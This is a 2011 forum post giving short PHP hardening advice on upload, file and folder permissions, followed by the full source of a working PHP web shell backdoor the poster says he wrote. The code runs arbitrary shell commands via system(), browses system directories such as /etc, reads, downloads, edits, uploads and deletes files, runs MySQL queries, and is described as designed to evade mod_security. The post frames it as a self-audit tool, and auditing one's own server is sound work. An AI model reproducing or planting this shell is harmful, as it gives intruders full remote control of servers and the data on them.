Today's Posts Follow Us On Twitter! TFL Members on Twitter  
Forum search: Advanced Search  
Navigation
Marketplace
  Members Login:
Lost password?
  Forum Statistics:
Forum Members: 24,254
Total Threads: 80,792
Total Posts: 566,471
There are 1252 users currently browsing (tf).
 
  Our Partners:
 
  TalkFreelance     Business and Website Management     Articles From The Experts :

How secure is your PHP configuration?

Thread title: How secure is your PHP configuration?
Reply    
    Thread tools Search this thread Display Modes  
05-08-2011, 07:51 PM
#1
Village Genius is offline Village Genius
Village Genius's Avatar
Status: Geek
Join date: Apr 2006
Location: Denver, CO
Expertise: Software
Software: Chrome, Notepad++
 
Posts: 6,894
iTrader: 18 / 100%
 

Village Genius will become famous soon enough

  Old  How secure is your PHP configuration?

Properly securing your site has many aspects. One of these aspects is your PHP configuration. This is a last line of defense, not a first one. If for some reason a cracker has gotten a PHP script on to your server how much damage can he do? The best way to do this is to use the script included at the bottom and see what you can do. Here are some aspects you should look into. The idea with all of these is minimum permissions; the PHP user should have no more abilities than it needs.

Upload abilities.
If your site does not upload files via a script you should have it turned off. This removes the possibility that the cracker can use a backdoor to inject files on various parts of the server. While the ability to upload files is not an insecurity by itself it can only be a weakness if there is no valid use for it.

File permissions.
If you don’t have any scripts that require the modification of files don’t allow it. Modifying files can allow a hacker to infect files that can linger even after he is gone.

Don't allow scripts where uploads are supposed to go.
If you run an upload site no script should be allowed to run in the uploads directory. This means that even if someone can upload a PHP file it will just send the plain text opposed to actually running this. Doing this measure properly makes filetype checking irrelevant (although you may still want to do it).

Folder permissions.
The PHP user should have no access to directories that it doesn’t need to access. While anything above the webroot is fine, system files shouldn’t be part of it unless they are necessary.


See what a hacker could do with a script based backdoor.
The script below is a backdoor PHP script that I wrote most of. It is completely standalone, can do a lot of neat things and all its file abilities can bypass mod_security’s incoming data filters. To give a real list:
  • Traverse directories
  • Edit files
  • Delete files
  • Upload files
  • Directly download a file
  • View file contents as plain text
  • Execute mysql queries
  • Execute shell commands
  • Specifically designed to bypass mod_security in its file operations.

This is given solely for the purposes of auditing your own system, in no way do I condone using this tool against an unauthorized target. I've only tested this on Linux, it should work on windows though. Make sure to follow the instructions on the page when uploading files:
PHP Code:
<?

function cleanLinuxPath($path)
{
        
//If its a Windows path return what we had
        
if($path[0] != "/")
                return 
$path;
        
        
$parts=explode('/',$path);
        
        foreach(
$parts as $key=>$val)
        {
                if(
$val=="..")
                {
                        
$parts[$key]="";
                        
$lastKey=$key-1;
                        
$parts[$lastKey]="";
                }
                elseif(
$val==".")
                {
                        
$parts[$key]="";
                }
        }
        
reset($parts);
        foreach(
$parts as $val)
        {
                if(
$val != "")
                {
                        
$fixedPath .=  '/' $val;
                }
                
        }
        if(
$fixedPath=="")
        {
                
$fixedPath="/";
        }
        return 
$fixedPath;
}
if(isset(
$_REQUEST['dl'])){
        if(@
fopen($_REQUEST['dl'],'r')==true)
        {
                
$_REQUEST['dl'] .= '/' $_REQUEST['file'];
                if(
$_REQUEST['dl'][0]=='/'//If linux
                        
$fileArr=explode('/',$_REQUEST['dl']);
                else 
//If windows
                        
$fileArr=explode('\\',$_REQUEST['dl']);
                        
                
$fileName=$fileArr[sizeof($fileArr)-1]; //Extract the file name from the path
                
                
header('Content-disposition: attachment; filename=' $fileName);
                
header('Content-type: application/octet-stream');
                
readfile($_REQUEST['dl']);
        }
        else
        {
                
header('Content-disposition: attachment; filename=CANT_ACCESS_FILE');
                
header('Content-type: application/octet-stream');
                echo 
"Could not access file on server";
        }
        die();
}

ob_implicit_flush();
if(isset(
$_REQUEST['f'])){
        
$filename=$_REQUEST['f'];
        
$file=fopen("$filename","rb");
                
header("Content-Type: text/plain");
        
fpassthru($file);
        die;
}
if(isset(
$_REQUEST['d'])){
        
$d=$_REQUEST['d'];
        echo 
"<pre>";
        if (
$handle opendir("$d")) {
                echo 
"<h2>listing of " cleanLinuxPath($d) . " (<a target='_blank' href='?uploadForm=1&dir=" urlencode(cleanLinuxPath($d)) . "'>upload file</a>)</h2>";
                while (
$dir readdir($handle)){ 
                        if (
is_dir("$d/$dir")) 
                        {
                                if(
$dir != "." && $dir !="..")
                                        
$dirList[]=$dir;
                        }
                        else
                                
$fileList[]=$dir;
                }
                
                echo 
"<a href='$PHP_SELF?d=$d/.'><font color=grey>.\n</font></a>";
                echo 
"<a href='$PHP_SELF?d=$d/..'><font color=grey>..\n</font></a>";
                
        if(
is_array($dirList))
                foreach(
$dirList as $dir)
                {
                        echo 
"<a href='$PHP_SELF?d=$d/$dir'><font color=grey>$dir\n</font></a>";
                }
        if(
is_array($fileList))
                foreach(
$fileList as $dir)
                {
                        echo 
"<a href='$PHP_SELF?f=$d/$dir'><font color=black>$dir</font></a>" 
                                 
"|<a href='$PHP_SELF?dl=" cleanLinuxPath($d '&file=' .$dir) . "' target='_blank'>Download</a>|" 
                                 
"|<a href='$PHP_SELF?ef=" cleanLinuxPath($d '&file=' .$dir) . "' target='_blank'>Edit</a>|" 
                                 
"|<a href='$PHP_SELF?df=" cleanLinuxPath($d '&file=' .$dir) . "' target='_blank'>Delete</a>| \n";
                }
        } 
        else 
                echo 
"opendir() failed";
        
closedir($handle);
        die (
"<hr>"); 
}
if(isset(
$_REQUEST['c'])){
        echo 
"<pre>";
        
system($_REQUEST['c']);            
        die;
}
if(isset(
$_REQUEST['uploadForm'])){
        if(isset(
$_FILES["file_name"]))
        {
                if (
$_FILES["file_name"]["error"] > 0)
                {
                        echo 
"Error";
                }
                else
                {
                        
$target_path $_COOKIE["uploadDir"];
                        if(
substr($target_path,0,1)=="/" && substr($target_path,-1) != "/"//If on linx and no front slash
                                
$target_path .= "/";
                                
                        elseif(
substr($target_path,0,1)!="/" && substr($target_path,-1) != "\\"//If on linx and no front slash
                                
$target_path .= "\\";

                        
$target_path $target_path basename$_FILES['file_name']['name']); 

                        if(
move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
                                
setcookie("uploadDir","");
                                echo 
"The file ".  basename$_FILES['file_name']['name']). 
                                
" has been uploaded";
                        } else{
                        }

                }
        }
        else
        {       
                
?>
                <form target="_blank" action="<?php echo $PHP_SELF?>" method="GET">
                        <input type="hidden" name="cc" value="1" />
                        Submit this form before submitting file (will open in new window):<br />
                        Upload Directory: <input type="text" name="dir" value="<?= $_REQUEST["dir"?>"><br />
                        <input type="submit" value="submit" />
                </form>
                <br /><br />
                
                <form enctype="multipart/form-data" action="<?php echo $PHP_SELF?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
                Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form>

                <?
        
}
        die();
}
if(isset(
$_REQUEST['cc'])){
        
setcookie("uploadDir",$_GET["dir"]);
        echo 
"You are OK to upload the file, dont upload any others in between this.";
        die();
}
if(isset(
$_REQUEST['mquery'])){
        
        
$host=$_REQUEST['host'];
        
$usr=$_REQUEST['usr'];
        
$passwd=$_REQUEST['passwd'];
        
$db=$_REQUEST['db'];
        
$mquery=$_REQUEST['mquery'];
        
mysql_connect("$host""$usr""$passwd") or
    die(
"Could not connect: " mysql_error());
    
mysql_select_db("$db");
    
$result mysql_query("$mquery");
        if(
$result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
    while (
$row mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
    
mysql_free_result($result);
        die;
}
if(isset(
$_REQUEST['df'])){
        
$_REQUEST['df'] .= '/' $_REQUEST['file'];
        if(@
unlink($_REQUEST['df']))
        {
                echo 
"File deleted";
        }
        else
        {
                echo 
"Error deleting file";
        }
        die();
}
if(isset(
$_REQUEST['ef'])){
?>
<script type="text/javascript">
  <!--

  var keyStr = "ABCDEFGHIJKLMNOP" +
               "QRSTUVWXYZabcdef" +
               "ghijklmnopqrstuv" +
               "wxyz0123456789+/" +
               "=";

  function encode64(input) {
     input = escape(input);
     var output = "";
     var chr1, chr2, chr3 = "";
     var enc1, enc2, enc3, enc4 = "";
     var i = 0;

     do {
        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2)) {
           enc3 = enc4 = 64;
        } else if (isNaN(chr3)) {
           enc4 = 64;
        }

        output = output +
           keyStr.charAt(enc1) +
           keyStr.charAt(enc2) +
           keyStr.charAt(enc3) +
           keyStr.charAt(enc4);
        chr1 = chr2 = chr3 = "";
        enc1 = enc2 = enc3 = enc4 = "";
     } while (i < input.length);

     return output;
  }

  //--></script>

  <?
        $_REQUEST
['ef'] .= '/' $_REQUEST['file']; 
        if(isset(
$_POST["newcontent"]))
        {
                
$_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
                
$stream=@fopen($_REQUEST['ef'],"w");
                
                if(
$stream)
                {
                        
fwrite($stream,$_POST["newcontent"]);
                        echo 
"Write sucessful";
                }
                else
                {
                        echo 
"Could not write to file";
                }
                
fclose($stream);
        }
        
?>
        <form action="" name="f" method="POST">
        <textarea wrap="off" rows="40" cols="130" name="newcontent"><?= file_get_contents($_REQUEST['ef']) ?></textarea><br />
        <input type="submit" value="I base64 encoded it myself, dont run script" /><br />
        <input type="submit" value="Change (requires javascript to work)"  onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
        </form>
        <?
        
die();
}

?>

<pre><form action="<? echo $PHP_SELF?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
to browse go to ?d=[directory here]
<br>for example:
?d=/etc on *nix
c:/windows on win

Go to <a href="?d=<?= getcwd() ?>">current working directory</a>
Go to <a href="?d=/">root directory (linux only)</a>

<hr>execute mysql query:
<form action="<? echo $PHP_SELF?>" METHOD=GET >
host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">

database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
</span>

Reply    


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

  Posting Rules  
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump:
 
  Contains New Posts Forum Contains New Posts   Contains No New Posts Forum Contains No New Posts   A Closed Forum Forum is Closed